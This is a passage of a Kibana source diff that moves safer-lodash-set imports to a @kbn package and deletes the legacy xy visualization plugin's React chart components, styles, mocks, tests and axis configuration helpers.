{accessDeniedDrilldownUrl && ( (accessor ?? '').split('-').pop() ?? ''; + export interface Serie { id: string; rawId: string; diff --git a/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js b/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js index 18958b6439a8c..2a5ab819c00ac 100644 --- a/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js +++ b/src/plugins/vis_types/vislib/public/vislib/lib/axis/axis_config.js @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import d3 from 'd3'; import { SCALE_MODES } from './scale_modes'; diff --git a/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js b/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js index 32a41ec5ed489..a9ffe384ee78f 100644 --- a/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js +++ b/src/plugins/vis_types/vislib/public/vislib/lib/chart_grid.js @@ -7,7 +7,7 @@ */ import d3 from 'd3'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; const defaults = { diff --git a/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js b/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js index cc9e48897d053..3b60481c0affe 100644 --- a/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js +++ b/src/plugins/vis_types/vislib/public/vislib/lib/vis_config.js @@ -9,7 +9,7 @@ /** * Provides vislib configuration, throws error if invalid property is accessed without providing defaults */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import _ from 'lodash'; import { vislibTypesConfig as visTypes } from './types'; import { Data } from './data'; diff --git a/src/plugins/vis_types/xy/common/index.ts b/src/plugins/vis_types/xy/common/index.ts index f17bc8476d9a6..da2c02d6145d2 100644 --- a/src/plugins/vis_types/xy/common/index.ts +++ b/src/plugins/vis_types/xy/common/index.ts @@ -14,8 +14,3 @@ export enum ChartType { Area = 'area', Histogram = 'histogram', } - -/** - * Type of xy visualizations - */ -export type XyVisType = ChartType | 'horizontal_bar'; diff --git a/src/plugins/vis_types/xy/kibana.json b/src/plugins/vis_types/xy/kibana.json index 45f1c36331dfb..fa942c1530142 100644 --- a/src/plugins/vis_types/xy/kibana.json +++ b/src/plugins/vis_types/xy/kibana.json @@ -3,9 +3,8 @@ "version": "kibana", "ui": true, "server": true, - "requiredPlugins": ["charts", "data", "expressions", "visualizations", "fieldFormats"], - "requiredBundles": ["kibanaUtils", "visDefaultEditor", "kibanaReact"], - "optionalPlugins": ["usageCollection"], + "requiredPlugins": ["charts", "visualizations", "data", "expressions"], + "requiredBundles": ["kibanaUtils", "visDefaultEditor"], "extraPublicDirs": ["common/index"], "owner": { "name": "Vis Editors", diff --git a/src/plugins/vis_types/xy/public/_chart.scss b/src/plugins/vis_types/xy/public/_chart.scss deleted file mode 100644 index ac9d4ed04aec4..0000000000000 --- a/src/plugins/vis_types/xy/public/_chart.scss +++ /dev/null @@ -1,7 +0,0 @@ -.xyChart__container { - position: absolute; - top: 0; - right: 0; - bottom: 0; - left: 0; -} diff --git a/src/plugins/vis_types/xy/public/chart_split.tsx b/src/plugins/vis_types/xy/public/chart_split.tsx deleted file mode 100644 index e1d096334f17c..0000000000000 --- a/src/plugins/vis_types/xy/public/chart_split.tsx +++ /dev/null @@ -1,43 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { Accessor, AccessorFn, GroupBy, SmallMultiples, Predicate } from '@elastic/charts'; - -interface ChartSplitProps { - splitColumnAccessor?: Accessor | AccessorFn; - splitRowAccessor?: Accessor | AccessorFn; -} - -const CHART_SPLIT_ID = '__chart_split__'; - -export const ChartSplit = ({ splitColumnAccessor, splitRowAccessor }: ChartSplitProps) => { - if (!splitColumnAccessor && !splitRowAccessor) return null; - - return ( - <> - { - const splitTypeAccessor = splitColumnAccessor || splitRowAccessor; - if (splitTypeAccessor) { - return typeof splitTypeAccessor === 'function' - ? splitTypeAccessor(datum) - : datum[splitTypeAccessor]; - } - return spec.id; - }} - sort={Predicate.DataIndex} - /> - - - ); -}; diff --git a/src/plugins/vis_types/xy/public/components/_detailed_tooltip.scss b/src/plugins/vis_types/xy/public/components/_detailed_tooltip.scss deleted file mode 100644 index 91b0a8d023290..0000000000000 --- a/src/plugins/vis_types/xy/public/components/_detailed_tooltip.scss +++ /dev/null @@ -1,34 +0,0 @@ -.detailedTooltip { - @include euiToolTipStyle('s'); - pointer-events: none; - max-width: $euiSizeXL * 10; - overflow: hidden; - padding: $euiSizeS; - - table { - td, - th { - text-align: left; - padding: $euiSizeXS; - overflow-wrap: break-word; - word-wrap: break-word; - } - } -} - -.detailedTooltip__header { - > :last-child { - margin-bottom: $euiSizeS; - } -} - -.detailedTooltip__labelContainer, -.detailedTooltip__valueContainer { - overflow-wrap: break-word; - word-wrap: break-word; -} - -.detailedTooltip__label { - font-weight: $euiFontWeightMedium; - color: shade($euiColorGhost, 20%); -} diff --git a/src/plugins/vis_types/xy/public/components/detailed_tooltip.mock.ts b/src/plugins/vis_types/xy/public/components/detailed_tooltip.mock.ts deleted file mode 100644 index bc6a1f292dad3..0000000000000 --- a/src/plugins/vis_types/xy/public/components/detailed_tooltip.mock.ts +++ /dev/null @@ -1,187 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export const aspects = { - x: { - accessor: 'col-0-3', - column: 0, - title: 'timestamp per 3 hours', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '3', - params: { - date: true, - intervalESUnit: 'h', - intervalESValue: 3, - interval: 10800000, - format: 'YYYY-MM-DD HH:mm', - }, - }, - y: [ - { - accessor: 'col-1-1', - column: 1, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], -}; - -export const aspectsWithSplitColumn = { - x: { - accessor: 'col-0-3', - column: 0, - title: 'timestamp per 3 hours', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '3', - params: { - date: true, - intervalESUnit: 'h', - intervalESValue: 3, - interval: 10800000, - format: 'YYYY-MM-DD HH:mm', - }, - }, - y: [ - { - accessor: 'col-2-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - splitColumn: { - accessor: 'col-1-4', - column: 1, - title: 'Cancelled: Descending', - format: { - id: 'terms', - params: { - id: 'boolean', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }, - aggType: 'terms', - aggId: '4', - params: {}, - }, -}; - -export const aspectsWithSplitRow = { - x: { - accessor: 'col-0-3', - column: 0, - title: 'timestamp per 3 hours', - format: { - id: 'date', - params: { - pattern: 'YYYY-MM-DD HH:mm', - }, - }, - aggType: 'date_histogram', - aggId: '3', - params: { - date: true, - intervalESUnit: 'h', - intervalESValue: 3, - interval: 10800000, - format: 'YYYY-MM-DD HH:mm', - }, - }, - y: [ - { - accessor: 'col-3-1', - column: 2, - title: 'Count', - format: { - id: 'number', - }, - aggType: 'count', - aggId: '1', - params: {}, - }, - ], - splitRow: { - accessor: 'col-1-5', - column: 1, - title: 'Carrier: Descending', - format: { - id: 'terms', - params: { - id: 'string', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }, - aggType: 'terms', - aggId: '4', - params: {}, - }, -}; - -export const header = { - seriesIdentifier: { - key: 'groupId{__pseudo_stacked_group-ValueAxis-1__}spec{area-col-1-1}yAccessor{col-1-1}splitAccessors{}smV{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}smH{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}', - specId: 'area-col-1-1', - yAccessor: 'col-1-1', - splitAccessors: {}, - seriesKeys: ['col-1-1'], - smVerticalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - smHorizontalAccessorValue: '__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__', - }, - valueAccessor: 'y1', - label: 'Count', - value: 1611817200000, - formattedValue: '1611817200000', - markValue: null, - color: '#54b399', - isHighlighted: false, - isVisible: true, -}; - -export const value = { - seriesIdentifier: { - key: 'groupId{__pseudo_stacked_group-ValueAxis-1__}spec{area-col-1-1}yAccessor{col-1-1}splitAccessors{}smV{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}smH{__ECH_DEFAULT_SINGLE_PANEL_SM_VALUE__}', - specId: 'area-col-1-1', - yAccessor: 'col-1-1', - splitAccessors: [], - seriesKeys: ['col-1-1'], - smVerticalAccessorValue: 'kibana', - smHorizontalAccessorValue: 'false', - }, - valueAccessor: 'y1', - label: 'Count', - value: 52, - formattedValue: '52', - markValue: null, - color: '#54b399', - isHighlighted: true, - isVisible: true, -}; diff --git a/src/plugins/vis_types/xy/public/components/detailed_tooltip.test.tsx b/src/plugins/vis_types/xy/public/components/detailed_tooltip.test.tsx deleted file mode 100644 index aa76b680f6cc0..0000000000000 --- a/src/plugins/vis_types/xy/public/components/detailed_tooltip.test.tsx +++ /dev/null @@ -1,62 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getTooltipData } from './detailed_tooltip'; -import { - aspects, - aspectsWithSplitColumn, - aspectsWithSplitRow, - header, - value, -} from './detailed_tooltip.mock'; - -describe('getTooltipData', () => { - it('returns an array with the header and data information', () => { - const tooltipData = getTooltipData(aspects, header, value); - expect(tooltipData).toStrictEqual([ - { - label: 'timestamp per 3 hours', - value: '1611817200000', - }, - { - label: 'Count', - value: '52', - }, - ]); - }); - - it('returns an array with the data information if the header is not applied', () => { - const tooltipData = getTooltipData(aspects, null, value); - expect(tooltipData).toStrictEqual([ - { - label: 'Count', - value: '52', - }, - ]); - }); - - it('returns an array with the split column information if it is provided', () => { - const tooltipData = getTooltipData(aspectsWithSplitColumn, null, value); - expect(tooltipData).toStrictEqual([ - { - label: 'Cancelled: Descending', - value: 'false', - }, - ]); - }); - - it('returns an array with the split row information if it is provided', () => { - const tooltipData = getTooltipData(aspectsWithSplitRow, null, value); - expect(tooltipData).toStrictEqual([ - { - label: 'Carrier: Descending', - value: 'kibana', - }, - ]); - }); -}); diff --git a/src/plugins/vis_types/xy/public/components/detailed_tooltip.tsx b/src/plugins/vis_types/xy/public/components/detailed_tooltip.tsx deleted file mode 100644 index a7eb7a909615b..0000000000000 --- a/src/plugins/vis_types/xy/public/components/detailed_tooltip.tsx +++ /dev/null @@ -1,146 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React from 'react'; -import { isNil } from 'lodash'; - -import { - CustomTooltip, - TooltipValue, - TooltipValueFormatter, - XYChartSeriesIdentifier, -} from '@elastic/charts'; - -import { Aspects } from '../types'; - -import './_detailed_tooltip.scss'; -import { COMPLEX_SPLIT_ACCESSOR, isRangeAggType } from '../utils/accessors'; - -interface TooltipData { - label: string; - value: string; -} - -export const getTooltipData = ( - aspects: Aspects, - header: TooltipValue | null, - value: TooltipValue -): TooltipData[] => { - const data: TooltipData[] = []; - - if (header) { - const xFormatter = isRangeAggType(aspects.x.aggType) ? null : aspects.x.formatter; - data.push({ - label: aspects.x.title, - value: xFormatter ? xFormatter(header.value) : `${header.value}`, - }); - } - - const valueSeries = value.seriesIdentifier as XYChartSeriesIdentifier; - const yAccessor = aspects.y.find(({ accessor }) => accessor === valueSeries.yAccessor) ?? null; - - if (yAccessor) { - data.push({ - label: yAccessor.title, - value: yAccessor.formatter ? yAccessor.formatter(value.value) : `${value.value}`, - }); - } - - if (aspects.z && !isNil(value.markValue)) { - data.push({ - label: aspects.z.title, - value: aspects.z.formatter ? aspects.z.formatter(value.markValue) : `${value.markValue}`, - }); - } - - valueSeries.splitAccessors.forEach((splitValue, key) => { - const split = (aspects.series ?? []).find(({ accessor }, i) => { - return accessor === key || key === `${COMPLEX_SPLIT_ACCESSOR}::${i}`; - }); - - if (split) { - data.push({ - label: split?.title, - value: - split?.formatter && !key.toString().startsWith(COMPLEX_SPLIT_ACCESSOR) - ? split?.formatter(splitValue) - : `${splitValue}`, - }); - } - }); - - if ( - aspects.splitColumn && - valueSeries.smHorizontalAccessorValue !== undefined && - valueSeries.smHorizontalAccessorValue !== undefined - ) { - data.push({ - label: aspects.splitColumn.title, - value: `${valueSeries.smHorizontalAccessorValue}`, - }); - } - - if ( - aspects.splitRow && - valueSeries.smVerticalAccessorValue !== undefined && - valueSeries.smVerticalAccessorValue !== undefined - ) { - data.push({ - label: aspects.splitRow.title, - value: `${valueSeries.smVerticalAccessorValue}`, - }); - } - - return data; -}; - -const renderData = ({ label, value }: TooltipData, index: number) => { - return label && value ? ( - - -
{label}
- - - -
{value}
- - - ) : null; -}; - -export const getDetailedTooltip = - (aspects: Aspects) => - (headerFormatter?: TooltipValueFormatter): CustomTooltip => { - return function DetailedTooltip({ header, values }) { - // Note: first value is not necessarily the closest value - // To be fixed with https://github.com/elastic/elastic-charts/issues/835 - // TODO: Allow multiple values to be displayed in tooltip - const highlightedValue = values.find(({ isHighlighted }) => isHighlighted); - - if (!highlightedValue) { - return null; - } - - const tooltipData = getTooltipData(aspects, header, highlightedValue); - - if (tooltipData.length === 0) { - return null; - } - - return ( -
- {headerFormatter && header && ( -
{headerFormatter(header)}
- )} - - {tooltipData.map(renderData)} -
-
- ); - }; - }; diff --git a/src/plugins/vis_types/xy/public/components/index.ts b/src/plugins/vis_types/xy/public/components/index.ts deleted file mode 100644 index 7aaeb17ab2828..0000000000000 --- a/src/plugins/vis_types/xy/public/components/index.ts +++ /dev/null @@ -1,13 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -export { XYAxis } from './xy_axis'; -export { XYEndzones } from './xy_endzones'; -export { XYCurrentTime } from './xy_current_time'; -export { XYSettings } from './xy_settings'; -export { XYThresholdLine } from './xy_threshold_line'; diff --git a/src/plugins/vis_types/xy/public/components/xy_axis.tsx b/src/plugins/vis_types/xy/public/components/xy_axis.tsx deleted file mode 100644 index b224639bdbff3..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_axis.tsx +++ /dev/null @@ -1,46 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { Axis } from '@elastic/charts'; - -import { AxisConfig } from '../types'; - -type XYAxisPros = AxisConfig; - -export const XYAxis: FC = ({ - id, - title, - show, - position, - groupId, - grid, - ticks, - domain, - style, - integersOnly, - timeAxisLayerCount, -}) => ( - -); diff --git a/src/plugins/vis_types/xy/public/components/xy_current_time.tsx b/src/plugins/vis_types/xy/public/components/xy_current_time.tsx deleted file mode 100644 index 68f1dd0d60b13..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_current_time.tsx +++ /dev/null @@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; -import { DomainRange } from '@elastic/charts'; -import { CurrentTime } from '@kbn/charts-plugin/public'; - -interface XYCurrentTime { - enabled: boolean; - isDarkMode: boolean; - domain?: DomainRange; -} - -export const XYCurrentTime: FC = ({ enabled, isDarkMode, domain }) => { - if (!enabled) { - return null; - } - - const domainEnd = domain && 'max' in domain ? domain.max : undefined; - return ; -}; diff --git a/src/plugins/vis_types/xy/public/components/xy_endzones.tsx b/src/plugins/vis_types/xy/public/components/xy_endzones.tsx deleted file mode 100644 index 50982cc30dc3c..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_endzones.tsx +++ /dev/null @@ -1,57 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { DomainRange } from '@elastic/charts'; - -import { Endzones } from '@kbn/charts-plugin/public'; - -interface XYEndzones { - enabled: boolean; - isDarkMode: boolean; - isFullBin: boolean; - hideTooltips?: boolean; - domain?: DomainRange; - adjustedDomain?: DomainRange; -} - -export const XYEndzones: FC = ({ - enabled, - isDarkMode, - isFullBin, - hideTooltips, - domain, - adjustedDomain, -}) => { - if ( - enabled && - domain && - adjustedDomain && - 'min' in domain && - 'max' in domain && - domain.minInterval !== undefined && - 'min' in adjustedDomain && - 'max' in adjustedDomain - ) { - return ( - - ); - } - - return null; -}; diff --git a/src/plugins/vis_types/xy/public/components/xy_settings.tsx b/src/plugins/vis_types/xy/public/components/xy_settings.tsx deleted file mode 100644 index f934a2c203196..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_settings.tsx +++ /dev/null @@ -1,195 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { - Direction, - Settings, - SettingsProps, - DomainRange, - Position, - PartialTheme, - ElementClickListener, - BrushEndListener, - RenderChangeListener, - LegendAction, - LegendColorPicker, - TooltipProps, - TickFormatter, - VerticalAlignment, - HorizontalAlignment, -} from '@elastic/charts'; - -import { renderEndzoneTooltip } from '@kbn/charts-plugin/public'; - -import { getThemeService } from '../services'; -import { VisConfig } from '../types'; - -declare global { - interface Window { - /** - * Flag used to enable debugState on elastic charts - */ - _echDebugStateFlag?: boolean; - } -} - -type XYSettingsProps = Pick< - VisConfig, - | 'markSizeRatio' - | 'rotation' - | 'enableHistogramMode' - | 'tooltip' - | 'isTimeChart' - | 'xAxis' - | 'orderBucketsBySum' -> & { - onPointerUpdate: SettingsProps['onPointerUpdate']; - externalPointerEvents: SettingsProps['externalPointerEvents']; - xDomain?: DomainRange; - adjustedXDomain?: DomainRange; - showLegend: boolean; - onElementClick: ElementClickListener; - onBrushEnd?: BrushEndListener; - onRenderChange: RenderChangeListener; - legendAction?: LegendAction; - legendColorPicker: LegendColorPicker; - legendPosition: Position; - truncateLegend: boolean; - maxLegendLines: number; - legendSize?: number; - ariaLabel?: string; -}; - -function getValueLabelsStyling() { - const VALUE_LABELS_MAX_FONTSIZE = 12; - const VALUE_LABELS_MIN_FONTSIZE = 10; - - return { - displayValue: { - fontSize: { min: VALUE_LABELS_MIN_FONTSIZE, max: VALUE_LABELS_MAX_FONTSIZE }, - alignment: { horizontal: HorizontalAlignment.Center, vertical: VerticalAlignment.Middle }, - }, - }; -} - -export const XYSettings: FC = ({ - markSizeRatio, - rotation, - enableHistogramMode, - tooltip, - isTimeChart, - xAxis, - orderBucketsBySum, - xDomain, - adjustedXDomain, - showLegend, - onElementClick, - onPointerUpdate, - externalPointerEvents, - onBrushEnd, - onRenderChange, - legendAction, - legendColorPicker, - legendPosition, - maxLegendLines, - truncateLegend, - legendSize, - ariaLabel, -}) => { - const themeService = getThemeService(); - const theme = themeService.useChartsTheme(); - const baseTheme = themeService.useChartsBaseTheme(); - const valueLabelsStyling = getValueLabelsStyling(); - - const themeOverrides: PartialTheme = { - markSizeRatio, - barSeriesStyle: { - ...valueLabelsStyling, - }, - crosshair: { - ...theme.crosshair, - }, - legend: { - labelOptions: { maxLines: truncateLegend ? maxLegendLines ?? 1 : 0 }, - }, - axes: { - axisTitle: { - padding: { - outer: 10, - }, - }, - }, - chartMargins: - legendPosition === Position.Top || legendPosition === Position.Right - ? { - bottom: (theme.chartMargins?.bottom ?? 0) + 10, - } - : { - right: (theme.chartMargins?.right ?? 0) + 10, - }, - }; - - const headerValueFormatter: TickFormatter | undefined = xAxis.ticks?.formatter - ? (value) => xAxis.ticks?.formatter?.(value) ?? '' - : undefined; - const headerFormatter = - isTimeChart && xDomain && adjustedXDomain - ? renderEndzoneTooltip( - xDomain.minInterval, - 'min' in xDomain ? xDomain.min : undefined, - 'max' in xDomain ? xDomain.max : undefined, - headerValueFormatter, - !tooltip.detailedTooltip - ) - : headerValueFormatter && - (tooltip.detailedTooltip ? undefined : ({ value }: any) => headerValueFormatter(value)); - - const boundary = document.getElementById('app-fixed-viewport') ?? undefined; - const tooltipProps: TooltipProps = tooltip.detailedTooltip - ? { - ...tooltip, - boundary, - customTooltip: tooltip.detailedTooltip(headerFormatter), - headerFormatter: undefined, - } - : { ...tooltip, boundary, headerFormatter }; - - return ( - - ); -}; diff --git a/src/plugins/vis_types/xy/public/components/xy_threshold_line.tsx b/src/plugins/vis_types/xy/public/components/xy_threshold_line.tsx deleted file mode 100644 index f28dbf726d287..0000000000000 --- a/src/plugins/vis_types/xy/public/components/xy_threshold_line.tsx +++ /dev/null @@ -1,47 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import React, { FC } from 'react'; - -import { AnnotationDomainType, LineAnnotation } from '@elastic/charts'; - -import { ThresholdLineConfig } from '../types'; - -type XYThresholdLineProps = ThresholdLineConfig & { - groupId?: string; -}; - -export const XYThresholdLine: FC = ({ - show, - value: dataValue, - color, - width, - groupId, - dash, -}) => { - if (!show) { - return null; - } - - return ( - - ); -}; diff --git a/src/plugins/vis_types/xy/public/config/get_agg_id.ts b/src/plugins/vis_types/xy/public/config/get_agg_id.ts deleted file mode 100644 index 9586d0f082c1a..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_agg_id.ts +++ /dev/null @@ -1,14 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/** - * Get agg id from accessor - * - * For now this is determined by the esaggs column name. Could be cleaned up in the future. - */ -export const getAggId = (accessor: string) => (accessor ?? '').split('-').pop() ?? ''; diff --git a/src/plugins/vis_types/xy/public/config/get_aspects.ts b/src/plugins/vis_types/xy/public/config/get_aspects.ts deleted file mode 100644 index ee4b403301d87..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_aspects.ts +++ /dev/null @@ -1,89 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { compact } from 'lodash'; - -import { i18n } from '@kbn/i18n'; - -import { DatatableColumn } from '@kbn/expressions-plugin/public'; - -import { Aspect, Dimension, Aspects, Dimensions } from '../types'; -import { getFormatService } from '../services'; -import { getAggId } from './get_agg_id'; - -export function getEmptyAspect(): Aspect { - return { - accessor: null, - aggId: null, - aggType: null, - title: i18n.translate('visTypeXy.aggResponse.allDocsTitle', { - defaultMessage: 'All docs', - }), - params: { - defaultValue: '_all', - }, - }; -} -export function getAspects( - columns: DatatableColumn[], - { x, y, z, series, splitColumn, splitRow }: Dimensions -): Aspects { - const seriesDimensions = Array.isArray(series) || series === undefined ? series : [series]; - - return { - x: getAspectsFromDimension(columns, x) ?? getEmptyAspect(), - y: getAspectsFromDimension(columns, y) ?? [], - z: z && z?.length > 0 ? getAspectsFromDimension(columns, z[0]) : undefined, - series: getAspectsFromDimension(columns, seriesDimensions), - splitColumn: splitColumn?.length ? getAspectsFromDimension(columns, splitColumn[0]) : undefined, - splitRow: splitRow?.length ? getAspectsFromDimension(columns, splitRow[0]) : undefined, - }; -} - -function getAspectsFromDimension( - columns: DatatableColumn[], - dimension?: Dimension | null -): Aspect | undefined; -function getAspectsFromDimension( - columns: DatatableColumn[], - dimensions?: Dimension[] | null -): Aspect[] | undefined; -function getAspectsFromDimension( - columns: DatatableColumn[], - dimensions?: Dimension | Dimension[] | null -): Aspect[] | Aspect | undefined { - if (!dimensions) { - return; - } - - if (Array.isArray(dimensions)) { - return compact( - dimensions.map((d) => { - const column = d && columns[d.accessor]; - return column && getAspect(column, d); - }) - ); - } - - const column = columns[dimensions.accessor]; - return column && getAspect(column, dimensions); -} - -const getAspect = ( - { id: accessor, name: title }: DatatableColumn, - { accessor: column, format, params, aggType }: Dimension -): Aspect => ({ - accessor, - column, - title, - format, - aggType, - aggId: getAggId(accessor), - formatter: (value: any) => getFormatService().deserialize(format).convert(value), - params, -}); diff --git a/src/plugins/vis_types/xy/public/config/get_axis.test.ts b/src/plugins/vis_types/xy/public/config/get_axis.test.ts deleted file mode 100644 index 7dddae5702b2e..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_axis.test.ts +++ /dev/null @@ -1,78 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { getScale } from './get_axis'; -import type { Scale } from '../types'; - -describe('getScale', () => { - const axisScale = { - type: 'linear', - mode: 'normal', - scaleType: 'linear', - } as Scale; - - it('returns linear type for a number', () => { - const format = { id: 'number' }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('linear'); - }); - - it('returns ordinal type for a terms aggregation on a number field', () => { - const format = { - id: 'terms', - params: { - id: 'number', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('ordinal'); - }); - - it('returns ordinal type for a terms aggregation on a string field', () => { - const format = { - id: 'terms', - params: { - id: 'string', - otherBucketLabel: 'Other', - missingBucketLabel: 'Missing', - }, - }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('ordinal'); - }); - - it('returns ordinal type for a range aggregation on a number field', () => { - const format = { - id: 'range', - params: { - id: 'number', - }, - }; - const scale = getScale(axisScale, {}, format, true); - expect(scale.type).toBe('ordinal'); - }); - - it('returns time type for a date histogram aggregation', () => { - const format = { - id: 'date', - params: { - pattern: 'HH:mm', - }, - }; - const scale = getScale(axisScale, { date: true }, format, true); - expect(scale.type).toBe('time'); - }); - - it('returns linear type for an histogram aggregation', () => { - const format = { id: 'number' }; - const scale = getScale(axisScale, { interval: 1 }, format, true); - expect(scale.type).toBe('linear'); - }); -}); diff --git a/src/plugins/vis_types/xy/public/config/get_axis.ts b/src/plugins/vis_types/xy/public/config/get_axis.ts deleted file mode 100644 index 62e2345c80566..0000000000000 --- a/src/plugins/vis_types/xy/public/config/get_axis.ts +++ /dev/null @@ -1,199 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { identity } from 'lodash'; - -import { AxisSpec, TickFormatter, YDomainRange, ScaleType as ECScaleType } from '@elastic/charts'; - -import { LabelRotation } from '@kbn/charts-plugin/public'; -import { BUCKET_TYPES } from '@kbn/data-plugin/public'; -import { MULTILAYER_TIME_AXIS_STYLE } from '@kbn/charts-plugin/common'; - -import { - Aspect, - CategoryAxis, - Grid, - AxisConfig, - TickOptions, - ScaleConfig, - Scale, - ScaleType, - AxisType, - XScaleType, - YScaleType, - SeriesParam, -} from '../types'; - -export function getAxis( - { type, title: axisTitle, labels, scale: axisScale, ...axis }: CategoryAxis, - { categoryLines, valueAxis }: Grid, - { params, format, formatter, title: fallbackTitle = '', aggType }: Aspect, - seriesParams: SeriesParam[], - isDateHistogram = false, - useMultiLayerTimeAxis = false, - darkMode = false -): AxisConfig { - const isCategoryAxis = type === AxisType.Category; - // Hide unassigned axis, not supported in elastic charts - // TODO: refactor when disallowing unassigned axes - // https://github.com/elastic/kibana/issues/82752 - const show = - (isCategoryAxis || seriesParams.some(({ valueAxis: id }) => id === axis.id)) && axis.show; - const 